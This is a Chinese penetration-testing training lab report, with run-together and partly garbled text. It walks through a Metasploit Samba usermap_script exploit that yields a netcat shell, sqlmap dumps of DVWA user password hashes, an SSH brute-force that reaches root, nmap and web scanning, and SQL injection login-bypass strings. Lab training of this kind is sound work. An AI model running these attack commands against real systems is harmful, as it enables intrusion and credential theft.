渗透测试 实验报告

1、渗透测试培训3月13日第一天：主要实验总结 首先利用stuts2漏洞，可以直接执行任意命令，取得主机控制权。实验环境：KALI linux作为攻击工具；owasp作为靶机2003 metaspoitable实现能够成功访问使用metaspliot完成对于靶机samba服务的攻击，获取shell权限search samba查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow option

2、s查看需要设置的参数设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得 网络可达，网络配置上选择nat模式，地址范围为2、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf passwd* exec: passwd输入新的UNIX密码：重新输入新的UNIX密码：passwd： 已成功更新密码然后寻找samba模块msf search sambaMatching ModulesNameDisclosure Date RankDescription - auxil

3、iary/admin/smb/samba_symlink_traversalnormalSamba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heapnormalSamba lsa_io_privilege_set Heap Overflowauxiliary/dos/samba/lsa_transnames_heapnormalSamba lsa_io_trans_names Heap Overflowauxiliary/dos/samba/read_nttrans_ea_list Samba read_nttr

4、ans_ea_list Integer Overflownormalexploit/freebsd/samba/trans2openSamba trans2open Overflow (*BSD x86)2003-04-07greatexploit/linux/samba/chain_replySamba chain_reply Memory Corruption (Linux x86)2010-06-16goodexploit/linux/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow2007-05-14goo

5、dexploit/linux/samba/setinfopolicy_heap2012-04-10normalSamba SetInformationPolicy AuditEventsInfo Heap Overflowexploit/linux/samba/trans2open Samba trans2open Overflow (Linux x86)2003-04-07greatexploit/multi/samba/nttransSamba 2.2.2 - 2.2.6 nttrans Buffer Overflow2003-04-07averageexploit/multi/samba

6、/usermap_scriptSamba username map script Command Execution2007-05-14excellentexploit/osx/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow2007-05-14averageexploit/osx/samba/trans2openSamba trans2open Overflow (Mac OS X PPC)2003-04-07greatexploit/solaris/samba/lsa_transnames_heap Samba

7、 lsa_io_trans_names Heap Overflow2007-05-14averageexploit/solaris/samba/trans2openSamba trans2open Overflow (Solaris SPARC)2003-04-07greatexploit/unix/misc/distcc_execDaemon Command Execution2002-02-01excellentDistCCexploit/unix/webapp/citrix_access_gateway_exec Access Gateway Command Execution2010-

8、12-21excellentCitrixexploit/windows/http/sambar6_search_resultsSambar 6 Search Results Buffer Overflow2003-06-21normalexploit/windows/license/calicclnt_getconfig2005-03-02averageComputer Associates License Client GETCONFIG Overflowpost/linux/gather/enum_configsLinux Gather Configurationsnormalmsf us

9、e multi/samba/usermap script选择渗透攻击模块msf exploit(usermap script) show payloads查看与该渗透模块相兼容的攻击载荷 Compatible PayloadsNameDisclosure Date Rank Descriptioncmd/unix/bind_awkShell, Bind TCP (via AWK) cmd/unix/bind_inetdBind TCP (inetd) cmd/unix/bind_luaShell, Bind TCP (via Lua) cmd/unix/bind_netcatBind TCP

10、(via netcat)cmd/unix/bind_netcat_gapingBind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perlBind TCP (via Perl)cmd/unix/bind_perl_ipv6Bind TCP (via perl) IPv6 cmd/unix/bind_rubyShell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6Bind TCP (via Ruby) IP

11、v6 cmd/unix/bind_zshShell, Bind TCP (via Zsh) cmd/unix/genericGeneric Command Execution cmd/unix/reverseDouble Reverse TCP (telnet) cmd/unix/reverse_awkShell, Reverse TCP (via AWK) cmd/unix/reverse_luaReverse TCP (via Lua) cmd/unix/reverse_netcatReverse TCP (via netcat) cmd/unix/reverse_netcat_gapin

12、gReverse TCP (via netcat -e) cmd/unix/reverse_opensslDouble Reverse TCP SSL (openssl) cmd/unix/reverse_perlReverse TCP (via Perl) cmd/unix/reverse_perl_sslReverse TCP SSL (via perl) cmd/unix/reverse_php_sslReverse TCP SSL (via php) cmd/unix/reverse_pythonnormal Unix Command normal Unix Command Shell

13、, normal Unix Command normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell,normal Unix Command normal Unix Command Shell,normal Unix Command normal Unix Command, normal Unix Command Shell,normal Unix Command normal Unix

14、 Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell, normal Unix Command Shell,Reverse TCP (via Python)normal Unix Command Shell,normal Unix Command Shell, normal Unix Command

15、 Shell, normal Unix Command Shell,normal Unix Command Shell,cmd/unix/reverse_python_sslReverse TCP SSL (via python) cmd/unix/reverse_rubyReverse TCP (via Ruby) cmd/unix/reverse_ruby_sslReverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnetDouble Reverse TCP SSL (telnet) cmd/unix/reverse_zshRev

16、erse TCP (via Zsh) msf exploit(usermap_script) set payload cmd/unix/bind_netcat 选择 netcat 工具在渗透攻击 成功后执行shellpayload = cmd/unix/bind_netcatmsf exploit(usermap_script) show options 查看需要设置的参数msf exploit(usermap_script) set RHOST 54 设置主机攻击主机msf exploit(usermap_script) exploit 启动攻击-cookie=security=low; P

17、HPSESSID=lu1d2nfdvfkgkc8fa628c0vh23带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and

18、 federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program Started bind handler* Command shell session 1 opened (28:56558 - 54:4444) at 2015-03-1316:06:40 +0800已经取得机子的控制权，可以增加用户useradd test用户增加成功&存活探测-PU -sn UDP ping不列服务，-Pn不适用pingnmap -sS -

19、Pn xx.xx.xx.xx tcp syn 扫描 不发送 icmp列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找 ms-08067 漏洞&nmap网站扫描msf nmapmsf nmap -sV -Pn MAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 2

20、2.84 secondsmsf nmap -PO -script=smb-check-vulns Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTHost is up (0.00021s latency).All 1000 scanned ports on 54 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds% msf nmap -O * exec: nmap -O Starti

21、ng Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (32)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Brother MFC-7820N p

22、rinter (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7

23、920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 57.

24、88 seconds msf use auxiliary/scanner/http/dir scannerRHOSTS = msf auxiliary(dir_scanner) run starting at 11:50:2011:50:20 INFO testing connection to the target URL11:50:20 INFO testing if the target URL is stable. This can take a couple of seconds11:50:21 INFO target URL is stable11:50:21 INFO testi

25、ng if GET parameter id is dynamic11:50:21 INFO confirming that GET parameter id is dynamic11:50:21 INFO GET parameter id is dynamic11:50:21 INFO heuristics detected web page charset ascii11:50:21 INFO heuristic (basic) test shows that GET parameter id might be injectable(possible DBMS: MySQL)11:50:2

26、1 INFO testing for SQL injection on GET parameter idheuristic (parsing) test showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? Y/n ydo you want to include all tests for MySQL extending provided level (1) and risk (1)? Y/n y11:50:25 INFO testin

27、g AND boolean-based blind - WHERE or HAVING clause11:50:25 WARNING reflective value(s) found and filtering out11:50:25 INFO GET parameter id seems to be AND boolean-based blind - WHERE or HAVING clause injectable11:50:25 INFO testing MySQL = 5.0 AND error-based - WHERE or HAVING clause11:50:25 INFO

28、GET parameter id is MySQL = 5.0 AND error-based - WHERE or HAVING clause injectable11:50:25 INFO testing MySQL inline queries11:50:25 INFO testing MySQL 5.0.11 stacked queries Detecting error code* Detecting error code* Scanned 2 of 2 hosts (100% complete)* Auxiliary module execution completedsqlmap

29、检查sql注入的漏洞rootkali:# sqlmaprootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#11:50:25 WARNING time-based comparison requires larger statistical model, please wait11:50:25 INFO testing MySQL 5.0.11 AND time-based blind11:50:36 INFO GET parameter id seems to be MySQL AND time-based

30、 blind injectable11:50:36 INFO testing MySQL UNION query (NULL) - 1 to 20 columns11:50:36 INFO automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found11:50:36 INFO ORDER BY technique seems to be usable. This should reduce th

31、e time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test11:50:36 INFO target URL appears to have 2 columns in query11:50:36 INFO GET parameter id is MySQL UNION query (NULL) - 1 to 20 columns injectable GET parameter

32、id is vulnerable. Do you want to keep testing the others (if any)? y/N n sqlmap identified the following injection points with a total of 41 HTTP(s) requests:-Place: GETParameter: idType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1 AND 4334=4334 AND iasX=i

33、asX&Submit=SubmitType: error-basedTitle: MySQL = 5.0 AND error-based - WHERE or HAVING clausePayload: id=1 AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0 x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END),0 x7163716271,FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

34、 AND zAHU=zAHU&Submit=SubmitType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload:id=1UNIONALLSELECTType: AND/OR time-based blindTitle: MySQL 5.0.11 AND time-based blindPayload: id=1 AND SLEEP(5) AND xfNp=xfNp&Submit=Submit-11:50:40 INFO the back-end DBMS is MySQLweb server operating s

35、ystem: Linux Ubuntu 10.04 (Lucid Lynx)back-end DBMS: MySQL 5.011:50:40 INFO fetched data logged to text files under /usr/share/sqlmap/output/29* shutting down at 11:50:40 rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; RHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23

36、 1 -p id -dbs 可以看出返回数据库为：11:53:32 WARNING reflective value(s) found and filtering outavailable databases 2:* dvwa* information_schemarootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#-cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23-p id -D dvwa -tables 查看dvwa数据库Database

37、: dvwa2 tables+| guestbook | users |+rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -D dvwa -T users -columnsDatabase: dvwa Table: users 6 columns +| Column | Type |+| user | varchar(15) | avatar | varchar(70) |

38、 first_name | varchar(15) | last_name | varchar(15) | password | varchar(32) | user_id | int(6) |+rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -D dvwa -T users -C user,password -dumpDatabase: dvwaTable: users5

39、 entries TOC o 1-5 h z +| user | password|+| 1337| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7| smithy | 5f4dcc3b5aa765d61d8327deb882cf99|+可以看出用户名为admin密

40、码是admin成功2day&情报收集whois域名注册信息查询。目标：netcraft网站提供的信息查询，查询网站宿主，站点排名，操作系统查询网站 旁注技术，主站没问题，可以看一下同服务器上其他的网站IP2domain反查询网站1、Google hacking2、目录结构parent directory site： /XXXX(inc:网站培植信息，数据库口令等；bak:备份文件；txt or sql数据结构等use auxiliary/scanner/http/dir_scannerset THREADS 50 设置进程set RHOSTS XXXX 设置目标设置完成后进行runexploi

41、t robots.txt告诉搜索引擎那些目录是敏感文件&3、检索特定类型文件site:XXXX.filetype.xls 4、搜索易存在SQL注入点的页面site:XXX inurl:login登陆界面里面在随机用户后面加个引号，引发数据库错误，然后可以发现数据库查询的格式select from users username=xx and password=xxadmin OR1admin or1select fromusers username=adminadmin or 1=1-密码就随便输入数字即可网站上页面上加一个引号如果存在注入就会出现数据库报错，否则就是页面没有变化还有一种方式就是

42、再后面加and 1=1或者1=2,，都会报错，还有a=aadmin or 1=1-进去sqlmapsqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#sqlmap -u http:/rootkali:# sqlmapsqlmap -u url -cookie=-p id -D -t主机探测与端口扫描活跃主机扫描USE ausiliary/scanner/discovery/arp_sweepset THREADS 50run2、nmap服务扫描与查点1、metasploit的scanner辅助模块中，有很多用于服务扫描和查点的工

43、具，这些工具常以service namelogin 命名search name:version2、ssh查点use auxiliary/scanner/ssh/ssh_versionset RHOSTS xxxxset THREADS 100 run &ssh查点实验:rootkali:# msfconsole msf use auxiliary/scanner/ssh/ssh version msf auxiliary(ssh_version) show optionsModule options (auxiliary/scanner/ssh/ssh_version):NameCurrent

44、 SettingRequiredDescription-RHOSTS yesThe target address range or CIDR identifierRPORT22yesThe target portTHREADS1yesThe number of concurrent threadsTIMEOUT30yesTimeout for the SSH probemsf auxiliary(ssh version) set RHOSTS msf auxiliary(ssh version) set THREADS 100set USERNAME rootset PASS_FILE /aa

45、aset THREAS 100runvi 一个密码文件口令嗅探set auxiliary/sniffer/psnuffle& 口令猜解实验：msf use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(ssh_login) show optionsModule options (auxiliary/scanner/ssh/ssh_login):NameCurrent SettingRequiredDescriptionBLANK_PASSWORDS falseBRUTEFORCE_SPEED 5DB_ALL_CREDSfalsein the curr

46、ent databaseDB_ALL_PASSfalsedatabase to the listDB_ALL_USERSfalsethe listPASSWORD withPASS_FILERHOSTSidentifierRPORT22STOP_ON_SUCCESS false for a hostTHREADS1USERNAME asUSERPASS_FILEseparated by space, one pair per lineUSER_AS_PASSfalseall usersUSER_FILEnoyesnononononoyesyesyesyesnonononoTry blank p

47、asswords for all usersHow fast to bruteforce, from 0 to 5Try each user/password couple storedAdd all passwords in the currentAdd all users in the current database toA specific password to authenticateFile containing passwords, one per lineThe target address range or CIDRThe target portStop guessing

48、when a credential worksThe number of concurrent threadsA specific username to authenticateFile containing users and passwordsTry the username as the password forFile containing usernames, one perlineVERBOSEtrueyes Whether to print output for allattemptsmsf auxiliary(ssh login) set USERNAME rootUSERN

49、AME = rootmsf auxiliary(ssh login) set PASS FILE / root/ passwd :在 root 根目录下创建一个密码文 件,名字叫passwdPASS_FILE = root passwdmsf auxiliary(ssh_login) set THREADS 50THREADS=50msf auxiliary(ssh login) run * 29:22 SSH - Starting bruteforce* 29:22 SSH - 1/3 - Trying: username: root with password: ahbieid-29:22

50、 SSH - 1/3 - Failed: root:ahbieid* 29:22 SSH - 2/3 - Trying: username: root with password: xideoejd-29:22 SSH - 2/3 - Failed: root:xideoejd* 29:22 SSH - 3/3 - Trying: username: root with password: owaspbwa* Command shell session 1 opened (28:40157 - 29:22) at 2015-03-14 13:51:30 +0800+ 29:22 SSH - 3

51、/3 - Success: root:owaspbwa uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux * Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completed口令猜解成功。&主机存活探测实验：msf use auxiliary/scanner/discovery/arp swee

52、pmsf auxiliary(arp_sweep) show optionsModule options (auxiliary/scanner/discovery/arp_sweep):NameCurrent SettingRequiredDescription-INTERFACE noThe name of the interfaceRHOSTSyesThe target address range or CIDR identifierSHOSTnoSource IP AddressSMACnoSource MAC AddressTHREADS1yesThe number of concur

53、rent threadsTIMEOUT5yesThe number of seconds to wait for new datamsf auxiliary(arp sweep) set RHOSTS msf auxiliary(arp sweep) set THREADS 50THREADS=50msf auxiliary(arp sweep) run * appears to be up (VMware, Inc.).* appears to be up (VMware, Inc.).* 29 appears to be up (VMware, Inc.).* 30 appears to

54、be up (VMware, Inc.).* 54 appears to be up (VMware, Inc.).* 54 appears to be up (VMware, Inc.).* Scanned 256 of 256 hosts (100% complete)* Auxiliary module execution completed&网络扫描Openvas 等Web扫描1、modules/auxiliary 下，wmapload wmap (初始化 wmap)wmap_sites -a (使用 wmap 进行扫描wmap_sites -lwmap_targets -t http

55、： /XXXXwamp_run -t (运行后，wmap会调用配置好的辅助模块对目标进行扫描，然后查看结果)wamp_run -evunls cd /usr/share/w3af/关于扫描的一个很实用的工具W3af w3af_consolepluginsaudit xss（表示跨站漏洞）sql （表示注入）漏洞 backpluginsoutput html_file, console output config html_fileset output_file 123.htmlset verbose Truebackbackpluginscrawl web_spidercrawl config

56、 web_spiderset only_forward Trueset follow_regex .* set ignore_regex backbacktargetset target back、。3注入关键字：参数化查询过滤（白名单）编码（绕过防注，过滤）Mysql款字节二次输入（任何输入都是有害的） 容错处理（暴错输入）最小权限（目前，非常多root，见乌云）0:8972/qhwxcs-djy/login.jsp 找到用户名和密码就可以登录进去&扫描实验：rootkali:# cd /usr/share/w3af/rootkali:/usr/share/w3af# w3af_consol

57、ew3af pluginsw3af/plugins help| list| List available plugins.|I1| back| Go to the previous menu.| exit| Exit w3af.1| bruteforce1| View, configure and enable bruteforce plugins| infrastructure| View, configure and enable infrastructure plugins| evasion| View, configure and enable evasion plugins| man

58、gle| View, configure and enable mangle plugins| audit| View, configure and enable audit plugins| grep| View, configure and enable grep plugins| output| View, configure and enable output plugins| auth| View, configure and enable auth plugins| crawl1| View, configure and enable crawl plugins|1w3af/plu

59、gins audit1| Plugin name | Status | Conf | Description| blind_sqli| Yes | Identify blind SQL injection| 1| vulnerabilities.| buffer_overflow| Find buffer overflow vulnerabilities.| cors_origin| Yes | Inspect if application checks that the value | of the Origin HTTP header isconsistent| with the valu

60、e of the remote IP address/Host | of the sender ofthe incoming HTTP request. | csrf| Identify Cross-Site Request Forgery| 1| vulnerabilities.| dav| Verify if the WebDAV module is properly| | configured.| eval| Yes | Find insecure eval() usage.| file_upload| Yes | Uploads a file and then searches for